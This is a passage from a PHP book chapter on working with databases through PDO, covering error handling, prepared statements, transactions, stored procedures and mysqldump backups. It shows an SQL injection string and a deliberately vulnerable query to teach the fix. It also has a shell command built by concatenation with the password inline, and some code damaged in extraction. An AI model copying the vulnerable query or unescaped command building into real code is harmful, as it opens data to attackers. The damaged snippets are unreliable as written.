use a custom error handler, or check your error logs, you may not notice it.

Using Exception Mode
PDO::ERRMODE_EXCEPTION creates a PDOException as well as setting the errorCode
property:

                                                             pdoError3.php (excerpt)

 $country = 'USA';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
                      PDO::ERRMODE_EXCEPTION);
   $sql = 'Select * from cities where CountryCode =:country';
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':country', $country, PDO::PARAM_STR);
   $stmt->execute();
52   The PHP Anthology


           ⋮ proceed to fetch data
         }

         catch (PDOException $e)

         {

             echo 'PDO Exception Caught. ';

             echo 'Error with the database: <br />';

             echo 'SQL Query: ', $sql;

             echo '<pre>';

             echo 'Error: ' . $e->getMessage() . '<br />';

             echo 'Code: ' . $e->getCode() . '<br />';

             echo 'File: ' . $e->getFile() . '<br />';

             echo 'Line: ' . $e->getLine() . '<br />';

             echo 'Trace: ' . $e->getTraceAsString();

             echo '</pre>';

         }




     PDO::ERRMODE_EXCEPTION allows you to wrap your code in a try {…} catch {…}
     block. An uncaught exception will halt the script and display a stack trace to let
     you know there’s a problem.

     The PDOException is an extension of the general PHP Exception class found in the
     Standard PHP Library (or SPL).8

     Discussion
     Most people will choose to take advantage of PHP’s more powerful object oriented
     model, and use the Exception mode to handle errors, since it follows the object
     oriented style of error handling—catching and handling different types of excep­
     tions—and is easier to work with.

     Regardless of the way you choose to handle your errors, it’s a good idea to return
     the text of the SQL query itself. This allows you to see exactly which query is
     problematic and will assist you in the error’s debugging.




     8
         You can learn more about the SPL and PHP’s base Exception class in the manual, at
     http://www.php.net/spl/ and http://www.php.net/manual/en/language.exceptions.php.
Using Databases with PDO         53


How do I add data to, or modify
data in, my database?
Being able to fetch data from the database is a start, but how can you put it there in
the first place?

Solution
We add data to the database with the SQL INSERT command, and modify data that’s
already in the database with the SQL UPDATE command. Both commands can be
sent to the database using either the query method or the prepare and execute
methods. I’ll be using the prepare and execute methods in this solution.

INSERT Data into the Database
First up, let’s look at a simple INSERT, using the City table from the world database:

                                                                   insert.php (excerpt)

 $id = '4080';
 $name = 'Guam';
 $country = 'GU';
 $district = 'Guam';
 $population = 171018;
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'INSERT INTO city
       (ID, Name, CountryCode, District, Population)
       VALUES (:id, :name, :country, :district, :pop)';
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':id', $id);
   $stmt->bindParam(':name', $name);
   $stmt->bindParam(':country', $country);
   $stmt->bindParam(':district', $district);
   $stmt->bindParam(':pop', $population);
   $stmt->execute();
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
54   The PHP Anthology


        echo 'Error with the database: <br />';

        echo 'SQL Query: ', $sql;

        echo 'Error: ' . $e->getMessage();

      }

      ?>




     UPDATE Data in the Database
     And here’s a simple UPDATE, using the City table from the world database:

                                                                   update.php (excerpt)

      $id = '4080';
      $name = 'Guam';
      $country = 'GU';
      $district = 'Guam';
      $population = 171019;     // data provided by the U.S. Census
                                // Bureau, International Data Base
                                // Mid year 2006
      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $sql = 'UPDATE city SET Name = :name,
            CountryCode = :country, District = :district,
            Population = :pop WHERE ID = :id';
        $stmt = $dbh->prepare($sql);
        $stmt->bindParam(':id', $id);
        $stmt->bindParam(':name', $name);
        $stmt->bindParam(':country', $country);
        $stmt->bindParam(':district', $district);
        $stmt->bindParam(':pop', $population);
        $stmt->execute();
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }
      ?>
Using Databases with PDO           55


Discussion
Note that other than changing the SQL statement used in the prepare method, the
code in both examples above is exactly the same. We do like to keep things easy in
PHP!

In a practical application, some, if not all of the inputs to the query will be garnered
from user-generated content. Because we’re using the prepare and execute methods,
we don’t have to worry about an SQL injection attack on this query: all the variables
will be escaped automatically.


       Be Cautious with UPDATE and DELETE
      Be very careful when you use UPDATE or DELETE in your SQL. If you don’t have
      a WHERE clause in your SQL statement, you will end up updating or deleting all
      the rows in the table. Needless to say, either outcome could cause serious problems!



How do I protect my web site
from an SQL injection attack?
An SQL injection attack occurs when an attacker exploits a legitimate user input
mechanism on your site to send SQL code that your unsuspecting script passes on
to the database for execution. The golden rule for avoiding SQL injection attacks
is: escape all data from external sources before letting it near your database. That
rule doesn’t just apply to INSERT and UPDATE queries, but also to SELECT queries.

As we discussed earlier, using prepared statements for all your queries within a
script almost eliminates the problem of SQL injection attacks, but if you choose to
use the query method, you’ll have no such protection—you’ll have to manually es­
cape any user input that goes into the query. Let’s look at an example:

                                                                       sqlInject.php (excerpt)

 //$city = 'New York';
 $city ="' or Name LIKE '%" ;
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
56   The PHP Anthology


            PDO::ERRMODE_EXCEPTION);

        $sql = "Select * from city where Name ='". $city ."'";

        foreach ($dbh->query($sql) as $row) 

        {

          print $row['Name'] . "t";

          print $row['CountryCode'] . "t";

          print $row['Population'] . "n";

        }

      } 

      catch (PDOException $e)

      {

        echo 'PDO Exception Caught. ';

        echo 'Error with the database: <br />';

        echo 'SQL Query: ', $sql;

        echo 'Error: ' . $e->getMessage();

      }




     In this example, we’ll pretend that the $city variable used in the SQL statement
     comes from a form submitted by the user. A typical user would submit something
     like New York. This would give us the following SQL statement:

      Select * from city where Name ='New York'



     This would cause no problems within the script. A savvy attacker, however, may
     enter ' OR Name LIKE '%, which would give us the following SQL statement:

      Select * from city where Name ='' OR Name LIKE '%'



     This input opens the entire table to the attacker. “No big deal,” you say. “It’s only
     a list of cities.” Yes, but what if instead of our simple city table, this was the author­
     ized users table? The attacker would have access to extremely sensitive data!

     Solution
     Luckily, this issue is fairly easy to avoid, though the solution will mean more work
     for you. You can use PDO’s handy quote method to escape any data that you’re
     passing to the SQL string. Simply change the SQL code to this:

       $sql = "Select * from city where Name ='".$dbh->quote($city)."'";
Using Databases with PDO         57

Remember that you’ll need to quote each individual piece of data you use in the
SQL query—there aren’t any shortcuts! That is, unless you consider prepare and
execute a shortcut.


Discussion
If you’re using the PDO->query method, always quote your input. Always!

If you choose to use the prepare and execute approach, you won’t have to quote
the values that you bind to the prepared SQL (for example, the values to be inser­
ted)—that’s all done for you by the driver. However, there may be times when you
won’t be able to bind a variable to the prepared SQL. In such cases, you’ll need to
quote any values you use that cannot be bound (for example, a GROUP BY or ORDER
BY clause, or the table name) if you’re building a dynamic SQL statement.

Remember: a strong defense is a good offense.


How do I create flexible SQL statements?
SQL is a powerful language for manipulating data. With PHP, we can construct SQL
statements out of variables—an approach that can be useful for sorting a table by a
single column, or displaying a large result set across multiple pages.

Solution
Until the SQL is prepared and executed, it’s still just a string that you can manipulate
as you’d expect. This solution uses concatenation based on user input to select cities
from the specified country and display them in a specified order:

                                                            flexSQLConcat.php (excerpt)

 $validCountries = array ('USA', 'CAN', 'GU', 'ISR');
 if (isset($_GET['country']) &&
     in_array($_GET['country'], $validCountries))
 {
     $country = $_GET['country'];
 }
 else
 {
     $country = 'USA';
 }
58   The PHP Anthology


      $order = (!isset($_GET['order'])) ? FALSE : $_GET['order'];

      try

      {

        $dbh = new PDO($dsn, $user, $password);

        $dbh->setAttribute(PDO::ATTR_ERRMODE, 

            PDO::ERRMODE_EXCEPTION);

        $sql = 'SELECT * FROM city WHERE CountryCode = :country';

        switch ($order) {

          case 'district':

            // Add to the $sql string

            $sql .= " ORDER BY District";

            break;

          case 'pop':

            $sql .= " ORDER BY Population DESC";

            break;

          default:

            // Default sort by title

            $sql .= " ORDER BY Name";

            break;

        }

        $stmt = $dbh->prepare($sql);

        $stmt->bindParam(':country', $country);

        $stmt->execute();

        while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {

          print $row['Name'] . "t";

          print $row['CountryCode'] . "t";

          print $row['Population'] . "n";

        }

      }

      catch (Exception $e)

      {

        echo 'PDO Exception Caught. ';

        echo 'Error with the database: <br />';

        echo 'SQL Query: ', $sql;

        echo 'Error: ' . $e->getMessage();

      }




     In this code, the user input is read either from a web form that has GET as its method,
     or a URL with a query string. In the switch statement above, we’re generating dy­
     namic SQL using concatenation. The $order value is read, and an ORDER BY clause
     is added to the SQL query.
Using Databases with PDO         59


Discussion
An alternative solution involves using sprintf to build your dynamic SQL. This
approach is similar to binding variables to the prepared SQL:

                                                         flexSQLSprintf.php (excerpt)

   switch ($order) {
     case 'district':
       $orderby = " District";
       break;
     case 'pop':
       $orderby = " Population DESC";
       break;
     default:
       $orderby = " Name";
       break;
   }
   $format = 'SELECT * FROM city
       WHERE CountryCode = :country ORDER BY %s';
   $sql = sprintf($format, $orderby);



It’s a matter of personal style, but either of these approaches can be extended to
columns, table names, WHERE clauses, LIMIT clauses, and anything else you wish to
include in your SQL query.

Remember that until the point at which the SQL is prepared and executed, it’s just
a string that you can manipulate as much as you require.


How do I find out how
many rows I’ve touched?
Often, it’s useful to be able to count the number of rows returned or affected by a
query before you do anything with them. This capability is particularly handy when
you’re splitting results across pages, or producing statistical information.

Solutions
The two solutions that follow will enable you to count the number of rows returned,
and the number of rows affected, by your operations within the database.
60   The PHP Anthology

     Counting the Rows Returned
     PDO doesn’t have a magic method that counts the number of rows returned from a
     SELECT call. You can use the PDOStatement->rowCount method to return the number
     of rows returned by a SELECT statement with some PDO database drivers. However,
     as the behavior of this function isn’t guaranteed to be consistent with every database
     driver, I won’t cover it here. Feel free to try it yourself with your database driver,
     but keep in mind that if you need to write portable code, this approach is not reliable.
     There is, however, a solution that works around this lack of a useful method—it
     uses the SQL aggregate function COUNT.

     Here’s the code that will count the number of rows returned:

                                                                         count.php (excerpt)

      $country = 'USA';
      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $sql = 'SELECT COUNT(*) FROM city
            WHERE CountryCode =:country';
        $stmt = $dbh->prepare($sql);
        $stmt->bindParam(':country', $country, PDO::PARAM_STR);
        $result = $stmt->execute();
        echo 'There are ', $stmt->fetchColumn(), ' rows returned.';
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }



     Discussion
     COUNT returns the number of rows from a query, or a part of a query, and is commonly
     used with the DISTINCT keyword. SQL’s aggregate function COUNT is widely suppor­
     ted by the various database systems. For more information on how your database
     handles COUNT, see your database’s documentation.
Using Databases with PDO          61

Counting the Rows Affected
We can use the PDOStatement->rowCount method to find out how many rows were
affected by an UPDATE, INSERT or DELETE query. The use of rowCount is not common
in typical PHP applications, but it can be a good way to inform users that “Number
of records deleted from the Customers table: n.”

Here’s the code you’ll need:

                                                                        affect.php (excerpt)

 $country = 'AFG';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'DELETE FROM city WHERE CountryCode = :country';
   $stmt = $dbh->prepare($sql);
   $stmt->bindParam(':country', $country, PDO::PARAM_STR);
   $result = $stmt->execute();
   echo 'Number of records deleted from the city table: ';
   echo $stmt->rowCount();
 }
 catch (PDOException $e)
 {
   echo 'PDO Exception Caught. ';
   echo 'Error with the database: <br />';
   echo 'SQL Query: ', $sql;
   echo 'Error: ' . $e->getMessage();
 }



After you call PDOStatement->execute, you can call the PDOStatement->rowCount
method to return the number of rows affected.


       Make Sure you Add a WHERE Clause
     When you’re using the SQL commands UPDATE and DELETE, always make sure
     you add a WHERE clause. Without it, you will either be updating an entire column
     in the database, or deleting all the data in the table, neither of which is what you
     likely meant to do!
62   The PHP Anthology


     How do I find out a new INSERT’s row
     number in an autoincrementing field?
     When you’re dealing with autoincrementing columns in database tables, you’ll often
     need to find out the ID of a row you’ve just inserted, so that you can update other
     tables with this information. After all, that’s how relationships between tables are
     maintained.

     Solution
     To accomplish this task, PDO provides the listInsertId method, which returns
     the ID generated by the last INSERT operation if this capability is supported by the
     driver being used.9 Here’s how it works:

                                                                                 lastId.php (excerpt)

         $name = 'Dededo';
         $country = 'GU';
         $district = 'Guam';
         $population = 42980; // according to the 2000 US census
         try
         {
           $dbh = new PDO($dsn, $user, $password);
           $dbh->setAttribute(PDO::ATTR_ERRMODE,
               PDO::ERRMODE_EXCEPTION);
           $sql = 'INSERT INTO city
               (Name, CountryCode, District, Population)
               VALUES (:name, :country, :district, :pop)';
           $stmt = $dbh->prepare($sql);
           $stmt->bindParam(':name', $name);
           $stmt->bindParam(':country', $country);
           $stmt->bindParam(':district', $district);
           $stmt->bindParam(':pop', $population);
           $stmt->execute();
           echo 'ID of last insert: ', $dbh->lastInsertId();
         }
         catch (PDOException $e)
         {


     9
         listInsertId may not behave consistently when it’s used with different database drivers—some
     database drivers do not support autoincrementing fields. Read the manual page at
     http://www.php.net/manual/en/function.PDO-lastInsertId.php for more information.
Using Databases with PDO        63


   echo   'PDO Exception Caught. ';

   echo   'Error with the database: <br />';

   echo   'SQL Query: ', $sql;

   echo   'Error: ' . $e->getMessage();

 }




Discussion
When you’re using the lastInsertId method, be sure to use the PDO object ($dbh
above), not the PDOStatement object (that’s the object you create when you use
prepare—$stmt above). If you don’t, an error will result.


How do I search my table?
Some people are just impatient; rather than exploring your site with the friendly
navigation system you’ve provided, they demand relevant information now! And
obliging PHP developers like you and I happily implement search functionality to
provide visitors with a shortcut to the information they want.

In the bad old days when all content was stored in the form of HTML files, develop­
ing usable search functionality could be quite a problem, but now that we use
databases to store content, performing searches becomes much easier.

Solution
The most basic form of search occurs against a single column, with the database
LIKE operator:

                                                                  like.php (excerpt)

 $country = 'A';
 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $sql = 'SELECT * FROM city
       WHERE CountryCode LIKE :country';
   $stmt = $dbh->prepare($sql);
   $country = $country.'%';
   $stmt->bindParam(':country', $country, PDO::PARAM_STR);
64   The PHP Anthology


        $stmt->execute();

        while ($row = $stmt->fetchObject()) {

          print $row->Name . "t";

          print $row->CountryCode . "t";

          print $row->Population . "n";

        }

      }

      catch (PDOException $e)

      {

        echo 'PDO Exception Caught. ';

        echo 'Error with the database: <br />';

        echo 'SQL Query: ', $sql;

        echo 'Error: ' . $e->getMessage();

      }




     Discussion
     The LIKE search is supported by almost all database systems,10 and is usually used
     in conjunction with wildcard characters. The % character I used in the example
     above matches any number of characters—even zero characters. The wildcard
     character used in the example allows my query to find any city in a country that
     starts with the letter A.

     The other wildcard character that’s typically available is _, which will match any
     single character. So if, in the example above, I wanted to find only cities in countries
     that started with A and ended with G, I’d need to change just one line of code:

      /* $country = $country.'%';     <- remove this */

      $country = $country.'_G';   // <- add this



     If you need a more complicated search method, check your database documentation
     to see what’s available. For example, MySQL has FULLTEXT search capabilities, as
     explained on the MySQL manual site.11




     10
          You should verify the availability of the LIKE keyword, and the wildcard characters you want to use
     with it, in your database system documentation.
     11
          http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html
Using Databases with PDO         65


How do I work with transactions?
Let’s imagine we’re trying to complete a transaction at our local bank—we need to
move some money from our savings account to our checking account (to pay for
that vacation, of course). Now, if a problem arises in the middle of the transaction
(after you withdraw the money from the savings account, but before you deposit it
into the checking account), the money will disappear, and you can forget that vaca­
tion. Or does it?

If you need to run a group of SQL queries as one operation in order to maintain the
integrity of your data, then you need transactions. Almost all databases provide
transaction support in one form or another, and knowing how to use transactions
with PDO can help you secure that well-deserved vacation.

Solution
We start the hypothetical transaction with the PDO->beginTransaction method,
and if all goes well, end it with PDO->commit. If a problem occurs, we use the
PDO->rollback method to undo everything that’s taken place in the transaction:

                                                            transaction.php (excerpt)

 try
 {
   $dbh = new PDO($dsn, $user, $password);
   $dbh->setAttribute(PDO::ATTR_ERRMODE,
       PDO::ERRMODE_EXCEPTION);
   $dbh->beginTransaction();
   $sql = 'INSERT INTO transactions
       (acctNo, type, value, adjustment)
       VALUES (:acctNo, :type, :value, :adjust)';
   $stmt = $dbh->prepare($sql);
   $stmt->execute(array(':acctNo'=>$acctFrom, ':type'=>$withdrawal,
       ':value'=>$amount, ':adjust'=>'-'));
   $sql = 'INSERT INTO transactions
       (acctNo, type, value, adjustment)
        VALUES (:acctNo, :type, :value, :adjust)';
   $stmt = $dbh->prepare($sql);
   $stmt->execute(array(':acctNo'=>$acctTo,
                         ':type'=>$deposit,
                         ':value'=>$amount,
                         ':adjust'=>'+'));
66   The PHP Anthology


        $dbh->commit();

      }

      catch (Exception $e)

      {

        $dbh->rollBack(); 

        ⋮ further error handling here
      }




     Discussion
     Before we get into the deeper nuances of PDO’s transaction handling capabilities,
     let’s look at the official definition of database transactions from the PDO manual
     page12:

     “If you’ve never encountered transactions before, they offer 4 major features:
     Atomicity, Consistency, Isolation and Durability (ACID).13 In layman’s terms, any
     work carried out in a transaction, even if it is carried out in stages, is guaranteed to
     be applied to the database safely, and without interference from other connections,
     when it is committed. Transactional work can also be automatically undone at your
     request (provided you haven’t already committed it), which makes error handling
     in your scripts easier.”

     “Transactions are typically implemented by “saving-up” your batch of changes to
     be applied all at once; this has the nice side effect of drastically improving the effi­
     ciency of those updates. In other words, transactions can make your scripts faster
     and potentially more robust (you still need to use them correctly to reap that bene­
     fit).”

     Unfortunately, not all database systems support transactions. So, by default, PDO
     will run in auto-commit mode, where each query is treated as its own transaction.
     If the database does not support transactions, the query is issued without one.

     If your database supports transactions, rather than using the auto-commit feature,
     you can start and stop transactions manually. In the example above, the
     PDO->beginTransaction and PDO->commit methods are called in the try block. The




     12
          http://www.php.net/pdo
     13
          Emphasis added by the author.
Using Databases with PDO             67

PDO->rollback is used in the catch block to roll the database back in case of a
problem.


How do I use stored procedures with PDO?
Many databases support stored procedures—scripts that are run on your database
typically in a database-specific SQL language.14 Stored procedures allow the manip­
ulation of the data close to the location where the data is held, reducing bandwidth.
They maintain the separation of the data from the script logic, and allow multiple
systems in potentially different languages to access the data in a uniform manner
(saving you valuable coding and debugging time). Finally, stored procedures increase
query speeds using predetermined execution plans, and can prevent any direct in­
teraction with the data, thereby protecting it.

Solution
Using PDO to work with stored procedures is fairly easy. In the example below,
you’ll see the simple stored procedure we’ll be interacting with in our code.15 It
does nothing more than generate the quote, “Out, damned spot!” from Shakespeare’s
Macbeth:

                                                                           getQuote.sql (excerpt)

 DROP PROCEDURE IF EXISTS getQuote;

 DELIMITER //
 CREATE PROCEDURE getQuote()
 BEGIN
 DECLARE outStr VARCHAR(45);
 SET outStr = "Out, damned spot!";
 SELECT outStr;
 END//

 DELIMITER ;



Here’s the code that uses the stored procedure:


14
   Such languages include PL/SQL (Oracle), T-SQL (SQL Server), PL/pgSQL (PostgreSQL), and SQL::2003

(IBM DB2 and MySQL).

15
   This procedure is written in SQL::2003 syntax for MySQL.
68   The PHP Anthology

                                                                          storedProc.php (excerpt)

      try
      {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
        $sql = 'CALL getQuote()';
        $stmt = $dbh->prepare($sql);
        $stmt->execute();
        $return_string = $stmt->fetch();
      }
      catch (PDOException $e)
      {
        echo 'PDO Exception Caught. ';
        echo 'Error with the database: <br />';
        echo 'SQL Query: ', $sql;
        echo 'Error: ' . $e->getMessage();
      }

      echo 'Called stored procedure.                 It returned: ', $return_string[0];



     The example script will produce this output:

      Called stored procedure. It returned: Out, Damned Spot!



     Discussion
     Each database’s stored procedure language is different, so be sure to check your
     system’s documentation to identify the specific syntax you’ll need to create a stored
     procedure. To learn more about MySQL’s stored procedures, check out the relevant
     manual pages.16

     In the example above, which was made for MySQL, you’ll notice that the stored
     procedure includes the DECLARE, SET, and SELECT statements. Generally speaking,
     these are needed in any MySQL stored procedure to retrieve data. Nothing special
     is needed to retrieve the data from the stored procedure—we just use the
     PDOStatement->fetch method to grab the value returned from the final SELECT




     16
          http://dev.mysql.com/doc/refman/5.0/en/stored-procedures.html
Using Databases with PDO         69

statement in the stored procedure. (MySQL normally uses an OUT parameter for the
stored procedure, but this is not necessary with PDO.)


How do I back up my database?
The bigger a database becomes, the more nerve-wracking it can be not to have a
backup of the data it contains. It’s truly the stuff of nightmares: what happens if
your server crashes and everything is lost?

It’s common for database software to have some kind of built-in backup utility for
just this reason. In this solution, we’ll work through an example that uses the
mysqldump utility for the MySQL database system.


Solution
You can export the contents of a database from the command line using mysqldump:

 mysqldump -uuser -psecret world > world.sql



This command will log in to MySQL as user “user” (-uuser) with the password
“secret” (-psecret) and output the contents of the world database to a file called
world.sql. The contents of world.sql will be a series of queries that can be run against
MySQL. Using the mysql utility, we can perform the reverse operation from the
command line:

 mysql -uuser -psecret world < world.sql



You can use PHP’s system function to execute this command from within a PHP
script (though you’ll need to be logged in and able to execute PHP scripts from the
command line). The following example wraps the mysqldump command line utility
in a handy PHP class that you can use to keep regular backups of your site:

                                                         MySQLDump.class.php (excerpt)

 <?php
 class MySQLDump
 {
   private $cmd;
   public function __construct($dbUser, $dbPass, $dbName, $dest,
       $zip = 'gz')
70   The PHP Anthology


        {

          $zip_util = array('gz'=>'gzip','bz2'=>'bzip2');

          if (array_key_exists($zip, $zip_util))

          {

            $fname = $dbName . '.' . date("w") . '.sql.' . $zip; 

            $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .

                ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' .

                $dest . '/' . $fname;

          }

          else

          {

            $fname = $dbName . '.' . date("w") . '.sql'; 

            $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .

                ' ' . $dbName . ' >' . $dest . '/' . $fname;

          }

        }

        public function backup()

        {

          system($this->cmd, $error);

          if ($error)

          {

            trigger_error('Backup failed: ' . $error);

          }

        }

      }

      ?>





           MySQLDump Assumptions
          The MySQLDump class makes some assumptions about your operating system
          configuration. It assumes that the mysqldump utility is available in the path of
          the user that executes this script. If the gzip or bzip2 utilities are used, they’re
          also expected to be present in the user’s path. If you have a choice, use bzip2, as
          it provides better compression than gzip, and helps to save disk space.


     The following code shows how this class can be used:

                                                                            backup.php (excerpt)

      <?php
      require_once 'MySQLDump.class.php';
      $dbUser = 'user';
Using Databases with PDO        71


 $dbPass = 'secret';

 $dbName = 'world';

 $dest   = '/home/user/backups';

 $zip    = 'bz2';

 $mysqlDump = new MySQLDump($dbUser, $dbPass, $dbName, $dest, $zip);

 $mysqlDump->backup();

 ?>




This code will create a backup of the world database in the /home/user/backups
directory. If you test this example, make sure to change the variables to suit your
setup.

Discussion
The $dest variable specifies the path to the directory in which the backup file
should be placed. The filename that’s created will be in this format:

databaseName.dayOfWeek.sql.zipExtension


Here’s an example:

world.1.sql.bz2

A number from 0 to 6 that represents the day of the week (0 being Sunday and 6
being Saturday) is inserted into the dayOfWeek element. This filename convention
can provide a weekly rolling backup, with the files for the current week overwriting
those from the previous week. Such an approach should provide adequate backups;
it gives you a week to discover any serious problems, and doesn’t require excessive
disk space for file storage.

The use of a ZIP utility is optional. The default value of the $zip parameter is gz,
which indicates the gzip utility should be used. The other option is bz2, which
indicates the bzip2 utility should be used. If neither of these values is used, no
compression will be made; however, for large databases it’s obviously a good idea
to use a compression tool to minimize the amount of disk space required.

This class is intended for use with the crontab utility, which is a Unix feature that
allows you to execute scripts on a regular (for example, daily) basis.
72   The PHP Anthology

     Catering to Platform Differences
     You may have noticed that the above MySQLDump class will only work on a *nix
     server. What if your database server uses a Windows box? I offer the following
     solution to circumvent this problem. First we define an abstract MySQLDump class,
     then we extend it to create a class for each platform, and finally we create a factory
     method to instantiate the correct MySQLDump object needed. Here’s our abstract
     MySQLDump class:

                                                     AbstractMySQLDump.class.php (excerpt)

      require_once 'MySQLDump_ms.class.php';
      require_once 'MySQLDump_nix.class.php';

      abstract class MySQLDump
      {
        public static function factory($dbUser, $dbPass, $dbName, $dest,
            $zip)
        {
          if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
          {
            return new MySQLDump_ms($dbUser, $dbPass, $dbName, $dest,
                $zip);
          }
          else
          {
            return new MySQLDump_nix($dbUser, $dbPass, $dbName, $dest,
                $zip);
          }
        }

        abstract public function __construct($dbUser, $dbPass, $dbName,
            $dest, $zip = 'gz');

        public function backup()
        {
          system($this->cmd, $error);
          if ($error)
          {
            throw new MySQLDumpException(
                'Backup failed: Command = ' . $this->cmd .
                ' Error = ' . $error);
          }
        }
Using Databases with PDO        73


 }


 class MySQLDumpException extends Exception {}




The backup method represents our backup API. Child classes need to implement a
custom constructor that sets the cmd property. Overriding the backup method is
optional. The static method factory will instantiate a MySQLDump object instance
based on the PHP_OS constant—representing the host platform. We’ve also added a
custom exception class, MySQLDumpException, for error handling.

The *nix version of our backup class will contain an implementation similar to the
solution class above, but we’ll need to change the class definition so that it extends
the abstract MySQLDump class:

                                                    MySQLDump_nix.class.php (excerpt)

 require_once 'AbstractMySQLDump.class.php';
 class MySQLDump_nix extends MySQLDump
 {
   protected $cmd;

     public function __construct($dbUser, $dbPass, $dbName, $dest,
       $zip = 'gz')
     {
       $zip_util = array('gz'=>'gzip','bz2'=>'bzip2');
       if (array_key_exists($zip, $zip_util))
       {
         $fname = $dbName . '.' . date("w") . '.sql.' . $zip;
         $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
             ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' .
             $dest . '/' . $fname;
       }
       else
       {
         $fname = $dbName . '.' . date("w") . '.sql';
         $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
             ' ' . $dbName . ' >' . $dest . '/' . $fname;
       }
     }
 }
74   The PHP Anthology

     We can then make an implementation for the Windows platform:

                                                       MySQLDump_ms.class.php (excerpt)

      require_once 'AbstractMySQLDump.class.php';
      class MySQLDump_ms extends MySQLDump
      {
        protected $cmd;

          public function __construct($dbUser, $dbPass, $dbName, $dest,
              $zip = 'none')
          {
            $fname = $dbName . '.' . date("w") . '.sql';
            $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
                ' ' . $dbName . ' >' . $dest . '' . $fname;
          }
      }



     The Windows version above includes changes to suit the Windows path and ignores
     the $zip argument due to the lack of gzip and bzip2 on that platform. This class
     also assumes that the path to the mysqldump.exe executable file is in the system
     PATH environment variable.

     Here’s an example of a backup script that makes use of the above classes on a
     Windows box:

                                                                   backup2.php (excerpt)

      <?php
      require_once 'AbstractMySQLDump.class.php';
      try
      {
        $dbUser = 'user';
        $dbPass = 'secret';
        $dbName = 'world';
        $dest   = 'c:backups';
        $zip    = 'none';
        $mysqlDump = MySQLDump::factory($dbUser, $dbPass, $dbName,
            $dest, $zip);
        $mysqlDump->backup();
      }
      catch (Exception $e)
      {
Using Databases with PDO        75


   echo $e->getMessage();

 }

 ?>




Since we’ve used an abstract class to define our API, the use of the class remains
the same no matter what platform it’s used on, as long as it’s one of our supported
platforms.


Summary
There you have it—our whirlwind tour of PDO and databases is done! By now, you
should have a grasp of the basic workings between PHP’s PDO extension and data­
bases. We also covered the topics of searching, stored procedures, protecting your
script from SQL injection attacks, writing flexible code, and making database
backups.

Being able to work comfortably with a database is part of a strong foundation for
PHP, and learning to make the most of PHP’s PDO extension only makes it easier.
Use the examples and solutions presented here to help build on your existing
database skills.

I also hope you’ll take the time to learn more about SQL and your database. Learning
the nuances and capabilities of your chosen database platform can only help make
your code more efficient and elegant over time.
The PHP Anthology
3
                                                    Chapter




Strings
Strings are arguably the basis, the raison d’etre, nay, the beating heart of PHP. After
all, PHP really boils down to the input and output of strings. So, it’s hardly surprising
that PHP has more string-related functions than almost any other scripting language!

Unlike other languages such as C, strings in PHP are not arrays of characters; they’re
considered to be a simple type, or scalar. In PHP, strings can be defined using either
single (') or double (") quotes. Strings defined using double quotes are interpol­
ated—this means that variables within the string are substituted for their values.
Use single quotes for strings that require no interpolation. Strings themselves are
case sensitive, but a number of string functions allow operations on strings in a
case-insensitive manner. The PHP manual web site’s String Functions page has
links to all the string-related functions available.1

PHP’s variable interpolation is one of the many features that make the language so
quick and easy to use. However, there are limits to its capabilities. First, have a look
at this example:




1
    http://www.php.net/strings/
78   The PHP Anthology


      <?php

      $who = 'world';

      echo "Hello $who";

      ?>



     Here, we have a very simple variable, $who, that has a value of 'world'. When we
     place the variable name in the string, we end up with an output of “Hello world”.

     While this example is very simple, you may run into situations where your data is
     contained in an array or a complex object and in these cases, we need to help the
     PHP interpreter along. We either enclose the variable in braces ({ and }) or use
     concatenation—the . operator. Here’s an example of what I mean:

      <?php

      $user = array(

          "first_name" => "Davey",

          "last_name" => "Shafik"

      );

      // Using Braces

      echo "Hello {$user['first_name']} {$user['first_name']}";

      // Using Concatenation

      echo 'Hello ' . $user['first_name'] .' '. $user['last_name'];

      ?>



     In the above example we demonstrate variable interpolation by wrapping our vari­
     ables in braces. The final statement shows that we can achieve the same output if
     we use simple concatenation.

     Even though strings are considered to be scalar values, PHP has the ability to treat
     strings as arrays in certain situations. Consider this quick example where we output
     a string letter by letter in a for loop:

      <?php

      $string = 'Hello World!';

      $length = strlen($string);

      for ($i = 0; $i < $length; $i++) {

        echo $string[$i] . '<br />';

      }

      ?>
Strings    79
